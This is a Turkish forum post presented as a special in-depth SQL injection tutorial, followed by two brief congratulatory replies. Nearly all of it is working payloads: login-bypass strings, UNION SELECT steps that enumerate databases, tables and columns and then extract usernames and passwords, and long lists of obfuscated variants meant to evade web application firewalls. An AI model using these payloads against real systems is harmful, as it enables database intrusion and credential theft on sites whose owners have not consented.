Derinlemesine sql injection özel eğitim

grdn_freeman · 23 Eki 2023

İçerik bana ait sorun varsa özelden bildirirsiniz

SQL injection

" or ""="

--login kısmından sonra kod çalıştırma:
+
+POST METHODU İCİN
|password kısmı icin

assword= password:'11111' and 1=1#'
|name ve password kısmı icin= name:'admin' password:1' or 1=1' alternative name:'admin' password:'1' or 1=1'
|sadece name ile giris = name: admin'# password:hersey
+POST METHODU İCİN
+

--url de kod calıstırma:
+
+GET METHODU İCİN
|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

+GET METHODU İCİN

+veritabanı sayısı ögrenmek
|sütun sayısını öğrenmek icin order by 1 dek 1 sayısını arttırıp azaltmamız gerekiyor örn: order by 10 örn: order by 8 gibidir
|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

' order by 1%23&password=111111&user-info-php-submit-button=View+Account+Details
|kac sütun oldugunu ögrenirsek
|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

' union select 1, 2, 3, 4, 5%23&password=111111&user-info-php-submit-button=View+Account+Details
|veritabanı adları icin
|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

' union select 1, database(), user(), version(), 5%23&password=111111&user-info-php-submit-button=View+Account+Details
+veritabanı sayısı ögrenmek

+veritabanı adı ögrenme
|information_schema adlı veritabanı linux ve ubuntu sunucularda hazır olarak gelir ama deneme amaçlı degistirilebilir
|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

' union select 1, table_name, null, null, 5 from information_schema.tables%23&password=111111&user-info-php-submit-button=View+Account+Details
|sadece istedigimiz tablo icin
|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

' union select 1, table_name, null, null, 5 from information_schema.tables where table_schema='veritabanıadı'%23&password=111111&user-info-php-submit-button=View+Account+Details
+veritabanı adı ögrenme

+tablo verileri cekmek
|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

' union select 1, column_name, null, null, 5 from information_schema.columns where table_name='tabloadı'%23&password=111111&user-info-php-submit-button=View+Account+Details
+tablo verileri cekmek

+sonuc
|

Ziyaretçiler için linkler gizli, görmek için Giriş yap veya üye ol.

' union select 1, username, password, admin, 5 from tabloadı%23&password=111111&user-info-php-submit-button=View+Account+Details
+sonuc

--WAFF BYPASS

UNİON SELECT

%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

ORDER BY

/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

İnformation Schema Tables

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

Group Concat

gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

ᴜᴢᴀʏ · 23 Eki 2023

Eline sağlık crackerim

grdn_freeman · 23 Eki 2023

ᴜᴢᴀʏ' Alıntı:
Eline sağlık crackerim

Eyw devrem

Ara

Derinlemesine sql injection özel eğitim

grdn_freeman

Infinity

ᴜᴢᴀʏ

Heaven

grdn_freeman

Infinity